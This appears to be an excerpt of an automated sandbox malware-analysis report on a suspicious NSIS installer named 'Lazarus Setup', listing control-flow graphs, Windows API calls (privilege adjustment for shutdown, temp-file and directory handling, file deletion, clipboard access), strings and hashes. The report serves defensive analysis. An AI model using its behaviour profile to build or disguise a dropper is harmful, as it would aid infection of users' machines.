5330 40415c 5324->5330 5328 403ef1 19 API calls 5325->5328 5326 4041cb 5327 40429f 5326->5327 5329 4041d5 GetDlgItem 5326->5329 5335 403f58 8 API calls 5327->5335 5331 4040a6 5328->5331 5332 4041eb 5329->5332 5333 40425d 5329->5333 5330->5326 5330->5327 5334 4041a0 GetDlgItem SendMessageA 5330->5334 5336 403ef1 19 API calls 5331->5336 5332->5333 5340 404211 6 API calls 5332->5340 5333->5327 5341 40426f 5333->5341 5355 403f13 KiUserCallbackDispatcher 5334->5355 5338 40429a 5335->5338 5339 4040b3 CheckDlgButton 5336->5339 5353 403f13 KiUserCallbackDispatcher 5339->5353 5340->5333 5342 404275 SendMessageA 5341->5342 5343 404286 5341->5343 5342->5343 5343->5338 5346 40428c SendMessageA 5343->5346 5344 4041c6 5347 4042c4 SendMessageA 5344->5347 5346->5338 5347->5326 5348 4040d1 GetDlgItem 5354 403f26 SendMessageA 5348->5354 5350 4040e7 SendMessageA 5351 404105 GetSysColor 5350->5351 5352 40410e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5350->5352 5351->5352 5352->5338 5353->5348 5354->5350 5355->5344 4742 40173e 4743 402a3a 18 API calls 4742->4743 4744 401745 4743->4744 4745 4059ae 2 API calls 4744->4745 4746 40174c 4745->4746 4747 4059ae 2 API calls 4746->4747 4747->4746 5356 401ebe 5357 402a3a 18 API calls 5356->5357 5358 401ec5 5357->5358 5359 406010 2 API calls 5358->5359 5360 401ecb 5359->5360 5362 401edd 5360->5362 5363 405c6a wsprintfA 5360->5363 5363->5362 5364 40193f 5365 402a3a 18 API calls 5364->5365 5366 401946 lstrlenA 5365->5366 5367 402513 5366->5367

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4030ec-403121 SetErrorMode GetVersion 1 403123-40312b call 4060a5 0->1 2 403134 0->2 1->2 7 40312d 1->7 4 403139-40314c call 406037 lstrlenA 2->4 9 40314e-4031c1 call 4060a5 * 2 #17 OleInitialize SHGetFileInfoA call 405d0c GetCommandLineA call 405d0c GetModuleHandleA 4->9 7->2 18 4031c3-4031c8 9->18 19 4031cd-4031e2 call 4057a9 CharNextA 9->19 18->19 22 4032a7-4032ab 19->22 23 4032b1 22->23 24 4031e7-4031ea 22->24 27 4032c4-4032de GetTempPathA call 4030bb 23->27 25 4031f2-4031fa 24->25 26 4031ec-4031f0 24->26 29 403202-403205 25->29 30 4031fc-4031fd 25->30 26->25 26->26 34 4032e0-4032fe GetWindowsDirectoryA lstrcatA call 4030bb 27->34 35 403336-403350 DeleteFileA call 402c66 27->35 32 403297-4032a4 call 4057a9 29->32 33 40320b-40320f 29->33 30->29 32->22 51 4032a6 32->51 37 403211-403217 33->37 38 403227-403254 33->38 34->35 52 403300-403330 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 34->52 53 4033e4-4033f4 call 4035b2 OleUninitialize 35->53 54 403356-40335c 35->54 39 403219-40321b 37->39 40 40321d 37->40 42 403256-40325c 38->42 43 403267-403295 38->43 39->38 39->40 40->38 47 403262 42->47 48 40325e-403260 42->48 43->32 49 4032b3-4032bf call 405d0c 43->49 47->43 48->43 48->47 49->27 51->22 52->35 52->53 64 403518-40351e 53->64 65 4033fa-40340a call 405502 ExitProcess 53->65 57 4033d4-4033db call 40368c 54->57 58 40335e-403369 call 4057a9 54->58 66 4033e0 57->66 71 40336b-403394 58->71 72 40339f-4033a9 58->72 69 403520-403539 GetCurrentProcess OpenProcessToken 64->69 70 40359a-4035a2 64->70 66->53 79 40356b-403579 call 4060a5 69->79 80 40353b-403565 LookupPrivilegeValueA AdjustTokenPrivileges 69->80 74 4035a4 70->74 75 4035a8-4035ac ExitProcess 70->75 73 403396-403398 71->73 77 403410-403424 call 405485 lstrcatA 72->77 78 4033ab-4033b8 call 40586c 72->78 73->72 81 40339a-40339d 73->81 74->75 89 403431-40344b lstrcatA lstrcmpiA 77->89 90 403426-40342c lstrcatA 77->90 78->53 88 4033ba-4033d0 call 405d0c * 2 78->88 91 403587-403591 ExitWindowsEx 79->91 92 40357b-403585 79->92 80->79 81->72 81->73 88->57 89->53 94 40344d-403450 89->94 90->89 91->70 95 403593-403595 call 40140b 91->95 92->91 92->95 98 403452-403457 call 4053eb 94->98 99 403459 call 405468 94->99 95->70 106 40345e-40346b SetCurrentDirectoryA 98->106 99->106 107 403478-4034a0 call 405d0c 106->107 108 40346d-403473 call 405d0c 106->108 112 4034a6-4034c2 call 405d2e DeleteFileA 107->112 108->107 115 403503-40350a 112->115 116 4034c4-4034d4 CopyFileA 112->116 115->112 117 40350c-403513 call 405bc7 115->117 116->115 118 4034d6-4034f6 call 405bc7 call 405d2e call 40549d 116->118 117->53 118->115 127 4034f8-4034ff CloseHandle 118->127 127->115
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE ref: 00403111
                                                                                              • GetVersion.KERNEL32 ref: 00403117
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403169
                                                                                              • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                                              • GetCommandLineA.KERNEL32(Lazarus Setup,NSIS Error), ref: 0040319A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\3Pd480eWHA.exe",00000000), ref: 004031AD
                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\3Pd480eWHA.exe",00000020), ref: 004031D8
                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032E6
                                                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032F2
                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403306
                                                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040330E
                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040331F
                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403327
                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040333B
                                                                                                • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                                                • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                                              • OleUninitialize.OLE32(?), ref: 004033E9
                                                                                              • ExitProcess.KERNEL32 ref: 0040340A
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                                              • ExitProcess.KERNEL32 ref: 004035AC
                                                                                                • Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                              • String ID: "$"C:\Users\user\Desktop\3Pd480eWHA.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\synkefrit$C:\Users\user\Desktop$C:\Users\user\Desktop\3Pd480eWHA.exe$Error launching installer$Lazarus Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 3329125770-1171316478
                                                                                              • Opcode ID: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                                              • Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
                                                                                              • Opcode Fuzzy Hash: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                                              • Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 128 405063-40507f 129 405085-40514c GetDlgItem * 3 call 403f26 call 4047c3 GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 40520e-405214 128->130 152 40516a-40516d 129->152 153 40514e-405168 SendMessageA * 2 129->153 132 405216-405238 GetDlgItem CreateThread CloseHandle 130->132 133 40523e-40524a 130->133 132->133 135 40526c-405272 133->135 136 40524c-405252 133->136 137 405274-40527a 135->137 138 4052c7-4052ca 135->138 140 405254-405267 ShowWindow * 2 call 403f26 136->140 141 40528d-405294 call 403f58 136->141 142 4052a0-4052b0 ShowWindow 137->142 143 40527c-405288 call 403eca 137->143 138->141 146 4052cc-4052d2 138->146 140->135 149 405299-40529d 141->149 150 4052c0-4052c2 call 403eca 142->150 151 4052b2-4052bb call 404f25 142->151 143->141 146->141 154 4052d4-4052e7 SendMessageA 146->154 150->138 151->150 157 40517d-405194 call 403ef1 152->157 158 40516f-40517b SendMessageA 152->158 153->152 159 4053e4-4053e6 154->159 160 4052ed-405319 CreatePopupMenu call 405d2e AppendMenuA 154->160 167 405196-4051aa ShowWindow 157->167 168 4051ca-4051eb GetDlgItem SendMessageA 157->168 158->157 159->149 165 40531b-40532b GetWindowRect 160->165 166 40532e-405344 TrackPopupMenu 160->166 165->166 166->159 169 40534a-405364 166->169 170 4051b9 167->170 171 4051ac-4051b7 ShowWindow 167->171 168->159 172 4051f1-405209 SendMessageA * 2 168->172 173 405369-405384 SendMessageA 169->173 174 4051bf-4051c5 call 403f26 170->174 171->174 172->159 173->173 175 405386-4053a6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 4053a8-4053c8 SendMessageA 175->177 177->177 178 4053ca-4053de GlobalUnlock SetClipboardData CloseClipboard 177->178 178->159
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                                              • GetClientRect.USER32(?,?), ref: 0040510E
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                                                • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405238
                                                                                              • ShowWindow.USER32(00000000), ref: 0040525B
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                                              • ShowWindow.USER32(00000008), ref: 004052A8
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                                              • CreatePopupMenu.USER32 ref: 004052ED
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405387
                                                                                              • EmptyClipboard.USER32 ref: 0040538D
                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                                              • CloseClipboard.USER32 ref: 004053DE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: @y
                                                                                              • API String ID: 590372296-2793234042
                                                                                              • Opcode ID: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                                              • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                                              • Opcode Fuzzy Hash: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                                              • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 423 405d2e-405d39 424 405d3b-405d4a 423->424 425 405d4c-405d61 423->425 424->425 426 405f54-405f58 425->426 427 405d67-405d72 425->427 429 405d84-405d8e 426->429 430 405f5e-405f68 426->430 427->426 428 405d78-405d7f 427->428 428->426 429->430 433 405d94-405d9b 429->433 431 405f73-405f74 430->431 432 405f6a-405f6e call 405d0c 430->432 432->431 435 405da1-405dd6 433->435 436 405f47 433->436 437 405ef1-405ef4 435->437 438 405ddc-405de7 GetVersion 435->438 439 405f51-405f53 436->439 440 405f49-405f4f 436->440 443 405f24-405f27 437->443 444 405ef6-405ef9 437->444 441 405e01 438->441 442 405de9-405ded 438->442 439->426 440->426 447 405e08-405e0f 441->447 442->441 450 405def-405df3 442->450 448 405f35-405f45 lstrlenA 443->448 449 405f29-405f30 call 405d2e 443->449 445 405f09-405f15 call 405d0c 444->445 446 405efb-405f07 call 405c6a 444->446 461 405f1a-405f20 445->461 446->461 452 405e11-405e13 447->452 453 405e14-405e16 447->453 448->426 449->448 450->441 456 405df5-405df9 450->456 452->453 459 405e18-405e3b call 405bf3 453->459 460 405e4f-405e52 453->460 456->441 457 405dfb-405dff 456->457 457->447 471 405e41-405e4a call 405d2e 459->471 472 405ed8-405edc 459->472 464 405e62-405e65 460->464 465 405e54-405e60 GetSystemDirectoryA 460->465 461->448 463 405f22 461->463 467 405ee9-405eef call 405f77 463->467 469 405e67-405e75 GetWindowsDirectoryA 464->469 470 405ecf-405ed1 464->470 468 405ed3-405ed6 465->468 467->448 468->467 468->472 469->470 470->468 473 405e77-405e81 470->473 471->468 472->467 478 405ede-405ee4 lstrcatA 472->478 475 405e83-405e86 473->475 476 405e9b-405eb1 SHGetSpecialFolderLocation 473->476 475->476 480 405e88-405e8f 475->480 481 405eb3-405eca SHGetPathFromIDListA CoTaskMemFree 476->481 482 405ecc 476->482 478->467 484 405e97-405e99 480->484 481->468 481->482 482->470 484->468 484->476
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000006,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000), ref: 00405DDF
                                                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
                                                                                              • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
                                                                                              • CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                                              • lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll,00000000), ref: 00405F36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-902353857
                                                                                              • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                                              • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                                              • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                                              • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                                              APIs
                                                                                                • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                              • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 4227406936-0
                                                                                              • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                              • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                              • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                              • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 685 4055ae-4055d4 call 40586c 688 4055d6-4055e8 DeleteFileA 685->688 689 4055ed-4055f4 685->689 690 405777-40577b 688->690 691 4055f6-4055f8 689->691 692 405607-405617 call 405d0c 689->692 694 405725-40572a 691->694 695 4055fe-405601 691->695 698 405626-405627 call 4057c5 692->698 699 405619-405624 lstrcatA 692->699 694->690 697 40572c-40572f 694->697 695->692 695->694 700 405731-405737 697->700 701 405739-405741 call 406010 697->701 702 40562c-40562f 698->702 699->702 700->690 701->690 709 405743-405757 call 40577e call 405566 701->709 705 405631-405638 702->705 706 40563a-405640 lstrcatA 702->706 705->706 708 405645-405663 lstrlenA FindFirstFileA 705->708 706->708 711 405669-405680 call 4057a9 708->711 712 40571b-40571f 708->712 721 405759-40575c 709->721 722 40576f-405772 call 404f25 709->722 719 405682-405686 711->719 720 40568b-40568e 711->720 712->694 714 405721 712->714 714->694 719->720 723 405688 719->723 724 405690-405695 720->724 725 4056a1-4056af call 405d0c 720->725 721->700 729 40575e-40576d call 404f25 call 405bc7 721->729 722->690 723->720 726 405697-405699 724->726 727 4056fa-40570c FindNextFileA 724->727 735 4056b1-4056b9 725->735 736 4056c6-4056d1 call 405566 725->736 726->725 731 40569b-40569f 726->731 727->711 733 405712-405715 FindClose 727->733 729->690 731->725 731->727 733->712 735->727 738 4056bb-4056c4 call 4055ae 735->738 745 4056f2-4056f5 call 404f25 736->745 746 4056d3-4056d6 736->746 738->727 745->727 748 4056d8-4056e8 call 404f25 call 405bc7 746->748 749 4056ea-4056f0 746->749 748->727 749->727
                                                                                              APIs
                                                                                              • DeleteFileA.KERNELBASE(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004055D7
                                                                                              • lstrcatA.KERNEL32(Frbids.tal,\*.*,Frbids.tal,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040561F
                                                                                              • lstrcatA.KERNEL32(?,00409014,?,Frbids.tal,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405640
                                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,Frbids.tal,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405646
                                                                                              • FindFirstFileA.KERNELBASE(Frbids.tal,?,?,?,00409014,?,Frbids.tal,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405657
                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405715
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
